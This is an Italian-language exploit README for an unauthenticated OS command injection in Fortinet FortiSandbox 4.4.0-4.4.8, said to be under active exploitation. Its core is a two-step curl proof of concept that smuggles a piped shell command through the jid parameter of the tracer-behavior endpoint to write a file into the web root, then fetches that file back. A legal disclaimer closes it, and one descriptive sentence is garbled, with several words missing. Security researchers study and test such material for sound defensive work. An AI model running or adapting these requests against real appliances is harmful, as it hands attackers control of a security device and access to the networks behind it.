
Fortinet FortiSandbox 4.4.0-4.4.8 - Iniezione di comandi del sistema operativo tramite endpoint tracer-behavior
Fortinet FortiSandbox 4.4.0-4.4.8 - Iniezione di comandi del sistema operativo tramite endpoint tracer-behavior
Fortinet FortiSandbox è una soluzione avanzata di protezione dalle minacce che crea ambienti isolati per analizzare file, URL e traffico di rete sospetti alla ricerca di comportamenti dannosi. Combina analisi statica, analisi dinamica, machine learning basato su intelligenza artificiale e threat intelligence di FortiGuard per rilevare minacce zero-day, malware evasivo, ransomware e attacchi mirati che aggirano le difese tradizionali basate su firme. Le aziende dovrebbero implementare FortiSandbox per proteggersi dalle minacce emergenti, in particolare malware sconosciuti e minacce persistenti avanzate (APT); la soluzione fa detonare automaticamente i contenuti sospetti in un ambiente sicuro e isolato prima che raggiungano i sistemi di produzione. Si integra con la più ampia Fortinet Security Fabric e può essere implementata come appliance fisica, macchina virtuale, servizio cloud o soluzione containerizzata per adattarsi a diverse architetture di rete.
è una che interessa le versioni di FortiSandbox dalla alla . Il difetto deriva da una neutralizzazione non corretta di elementi speciali nell'input controllato dall'utente prima che venga utilizzato nella costruzione di comandi del sistema operativo (CWE-78) e interessa in particolare un endpoint API non specificato. Un attaccante non autenticato può sfruttare questa vulnerabilità inviando richieste HTTP appositamente formulate per eseguire con sul sistema sottostante. Uno sfruttamento riuscito concede all'attaccante il controllo completo sull'appliance , consentendogli di accedere ai campioni di malware analizzati, esfiltrare dati di configurazione sensibili, spostarsi verso segmenti di rete collegati o utilizzare il dispositivo compromesso come punto d'appoggio per ulteriori movimenti laterali all'interno dell'ambiente aziendale. Questa vulnerabilità è attualmente oggetto di sfruttamento attivo in the wild.
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
Questo repository e i suoi contenuti sono forniti strettamente per ricerca di sicurezza legittima, test di penetrazione autorizzati, studio educativo e finalità difensive. Accedendo o utilizzando questo materiale, riconosci la piena responsabilità di garantire che le tue attività siano conformi a tutte le leggi applicabili e di aver ottenuto la dovuta autorizzazione prima di testare o applicare queste tecniche a qualsiasi sistema che non possiedi.
Gli autori e i manutentori di questo progetto non si assumono alcuna responsabilità per danni, conseguenze legali o usi impropri derivanti dall'applicazione di queste informazioni. Qualsiasi uso per accesso non autorizzato, attività dannose o scopi illegali è espressamente vietato e non supportato.
Usa in modo responsabile. Rispetta la legge. Testa solo ciò che possiedi o per cui hai esplicita autorizzazione scritta.
SCT-PL